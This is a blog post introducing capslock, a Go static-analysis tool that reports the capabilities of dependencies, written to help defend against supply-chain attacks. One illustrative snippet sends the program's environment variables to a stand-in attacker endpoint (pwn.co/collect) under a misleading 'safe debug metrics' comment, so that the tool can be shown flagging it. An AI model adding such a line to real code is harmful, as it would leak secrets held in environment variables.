What are your Go dependencies capable of?—An introduction to capslock
Introduction
A solid standard library coupled with a philosophy of simplicity leads to typical Go projects having fewer and smaller dependencies when compared to other popular ecosystems.
Even so, bringing govulncheck to v1 was a priority for the Go security team in 2023, and Google is investing in projects like capslock to further make importing external Go modules safer.
This post aims to gives some background on these initiatives, with a focus on introducing capslock.
The threat
Sonatype’s 8th Annual State of the Software Supply Chain reported a 742% average annual increase in supply chain attacks between 2020 to 2022, with 6 of 7 vulnerabilities coming from transitive (indirect) dependencies.
Attacks can occur anywhere along the “chain” from writing source code to the point users are able to access/run the working software. A compromised dependency can pose a threat throughout the chain.
As an example of an attack within the Go ecosystem, capslock author Jess McClintock highlighted the recent rise in typosquatting on GitHub during her GopherCon 2023 talk.
Unwitting errors, as well as bad actors through deception or protestware scenarios, can also lead to compromised modules, which you may depend on directly or indirectly.
The defence
govulncheck can detect known vulnerabilities, but how can informed decisions be made about the attack surface of a module before depending on it? Which of these modules would you add to your go.mod
file?
Privileges like these are familiar to anyone who has downloaded an app on iOS or Android, and the ability to learn about and consent to what your apps are capable of doing is becoming more fine-grained. What would this look like for the Go modules ecosystem?
capslock and capabilities
capslock is a tool that aims to make the above permissions table a reality for Go packages. It uses static analysis to detect what a package— including transitively through its own dependencies — is capable of.
Here are a few of the capabilities defined in capabilities.md
that could be used to make informed decisions about the gooqle
and gorrilla
modules.
CAPABILITY_NETWORK
— Interact with the networkCAPABILITY_FILES
— Read/modify the file systemCAPABILITY_SYSTEM_CALLS
— Make direct system callsCAPABILITY_CGO
— Identifies calls that execute native code
Let’s see the result of running capslock on the official gorilla/securecookie
module.
$ go install github.com/google/capslock/cmd/capslock@latest
$ go get github.com/gorilla/securecookie
$ capslock -packages github.com/gorilla/securecookie
Analyzed packages:
github.com/gorilla/securecookie v1.1.1
CAPABILITY_REFLECT: 8 references
CAPABILITY_UNANALYZED: 7 references
Note that since reflect
is only accessed from tests, CAPABILITY_REFLECT
would not be output for a module that depends on gorilla/securecookie
. That’s because the reflect
usages cannot be accessed via any function call graph, and therefore are not an actual risk.
Detecting changes
Another feature of capslock is the ability to compare capabilities between executions. Here’s a simple program that executes ls
.
func main() {
cmd := exec.Command("ls")
cmd.Stdout = os.Stdout
_ = cmd.Run()
}
As expected, running capslock lets us know that exec
is being used.
$ capslock
Analyzed packages:
CAPABILITY_EXEC: 1 references
The output can be written in JSON format and saved for later use.
capslock -output=json > out.json
Let’s then modify the program to post environment variables to a collection endpoint.
// save important (and safe) debug metrics
metrics, _ := json.Marshal(os.Environ())
http.Post("http://pwn.co/collect", "application/json", bytes.NewBuffer(metrics))
Using the compare feature, it’s clear that concerning new capabilities have been added to the program. If this were a cookie encoder or UUID generator, then careful review and investigation would be required.
$ capslock -output=compare out.json
Package example has new capability CAPABILITY_NETWORK compared to the baseline.
Package example has new capability CAPABILITY_READ_SYSTEM_STATE compared to the baseline.
Package example has new capability CAPABILITY_REFLECT compared to the baseline.
How does it work?
The implementation has packages
and callgraph
from golang.org/x/tools/go
do most of the heavy lifting. The interesting parts of the main
function are described below. The source is on the capslock GitHub.
analyzer.GetClassifier
This function is called when no custom classifier is specified. A classifier defines capability mappings for specific functions, packages and cgo suffixes.
GetClassifier
calls interesting.DefaultClassifier
, which creates an in-memory representation of interesting.cm
. This allows taking a function name like net.Dial
and looking up the capability it is mapped to. The content of interesting.cm
looks like this.
func net.Dial CAPABILITY_NETWORK
func os.Environ CAPABILITY_READ_SYSTEM_STATE
func sync/atomic.SwapPointer CAPABILITY_UNSAFE_POINTER
package os/exec CAPABILITY_EXEC
package syscall CAPABILITY_SYSTEM_CALLS
package unsafe CAPABILITY_ARBITRARY_EXECUTION
cgo_suffix _Cgo_use
cgo_suffix _cgoCheckPointer
cgo_suffix _cgoCheckResult
analyzer.LoadPackages
This function uses the above-mentioned packages
package to load the packages specified with the -packages
flag. It returns them as a slice of type packages.Package
.
analyzer.RunCapslock
This function performs the static analysis. It calls analyzer.GetCapabilityCounts
, which is responsible for building the capability -> reference count
mappings present in the command output, e.g. CAPABILITY_EXEC: 1 references
.
After the function call graph is built using callgraph
and ssautil
, all nodes are looped through, and any node with a package or function name found in the classifier is added to a breadth-first search (BFS) queue.
package main
import (
"bytes"
"net/http"
"github.com/google/uuid"
)
func main() {
id := uuid.New().String()
http.Post("https://poster.com", "application/json", bytes.NewBufferString(id))
}
The above program would look something like below (simplified) at the start of the BFS. The classifier entry package net/http CAPABILITY_NETWORK
maps the entire net/http
package to CAPABILITY_NETWORK
, so http.Post
is marked as having this capability.
The BFS then moves out from the marked nodes until reaching the target package (main
). Each time it reaches main
, it will increment the reference count of the current capability.
The final output has CAPABILITY_NETWORK
with a reference count of one.
Analyzed packages:
github.com/google/uuid v1.3.1
CAPABILITY_NETWORK: 1 references
CAPABILITY_UNANALYZED: 1 references
Summary
Although experimental at the time of writing, capslock is already a useful tool for vetting Go modules. The compare feature also allows for integration into CI pipelines for detecting and acting on the addition of new capabilities to an existing dependency.
The potential of a future in which pkg.go.dev lists capabilities for every module, and Go tooling is able to break builds with unapproved capabilities is exciting for anyone concerned about supply chain attacks. If you’re one of these people, consider giving capslock a star and showing your support!